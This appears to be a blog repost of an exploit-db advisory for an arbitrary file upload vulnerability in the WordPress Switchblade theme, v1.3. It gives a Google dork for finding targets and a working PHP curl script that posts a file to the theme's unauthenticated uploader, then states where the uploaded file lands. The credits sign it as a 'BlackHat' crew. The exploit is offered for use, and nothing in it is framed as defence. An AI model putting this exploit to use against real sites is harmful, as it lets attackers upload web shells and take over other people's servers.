21 February 2015
####################################################################################################_________ .___ _______ ___. .__ #\_ ___ \ ____ __| _/____ \ \ ______ _ _\_ |__ |__| ____ #/ \ \/ / _ \ / __ |/ __ \ / | \_/ __ \ \/ \/ /| __ \| |/ __ \ #\ \___( <_> ) /_/ \ ___/ / | \ ___/\ / | \_\ \ \ ___/ # \______ /\____/\____ |\___ > \____|__ /\___ >\/\_/ |___ /__|\___ ># \/ \/ \/ \/ \/ \/ \/ #################################################################################################### Exploit Title: WordPress Switchblade Themes Arbitrary File Upload Vulnerability# Author: Byakuya# Date: 11/01/2013# Vendor Homepage: http://themeforest.net/# Themes Link: http://themeforest.net/item/switchblade-powerful-wordpress-theme/761353# Price: $50# Affected Version: v1.3# Infected File: php.php# Category: webapps/php# Google dork: inurl:/wp-content/themes/switchblade# Tested on : Windows/Linux#################################################################################################### Exploit & POC :<?php$uploadfile="up.php"; $ch = curl_init("http://127.0.0.1/wordpress/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php");curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult"; ?>#File path: http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie#Facebook: https://www.facebook.com/CodeNewbieCrew#Website: http://www.codenewbie.net#Malaysia & Indonesia BlackHat###################################################################################################Source : exploit-db.com Tag :
Hacking
Subscribe to:
Post Comments (Atom)
0 comments